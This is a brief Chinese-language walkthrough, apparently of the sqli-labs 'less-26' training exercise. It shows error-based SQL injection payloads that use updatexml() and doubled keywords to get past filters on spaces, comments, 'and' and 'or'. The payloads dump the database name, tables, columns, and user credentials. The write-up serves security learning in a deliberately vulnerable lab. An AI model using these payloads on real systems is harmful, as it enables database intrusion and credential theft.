** less-26**
单引号报错,看提示可以发现过滤掉了and,or,注释,空格
用两个单引号,后一个单引号闭合后面的单引号
可以使用 updatexml() 报错注入,因为这种手法不需要考虑空格的问题。爆数据库名
?id=-1' || updatexml(1,concat(0x7e,database()),1) || '1'='1
爆表名
?id=1' || updatexml(1, concat(0x7e, (SELECT (group_concat(table_name)) FROM (infoorrmation_schema.tables) WHERE (table_schema='security'))) ,1) || '1'='1
爆列名?id=1'||updatexml(1,concat(1,(SELECT (group_concat(column_name)) FROM (infoorrmation_schema.columns) WHERE (table_schema='security' %26%26 table_name = 'users'))) ,1) || '1'='1
爆数据?id=-1' || updatexml(1,concat(0x0a,(SELECT(group_concat(concat_ws(0x3a,username,passwoorrd))) FROM (security.users) WHERE (id = 1) )) ,1) || '1'='1
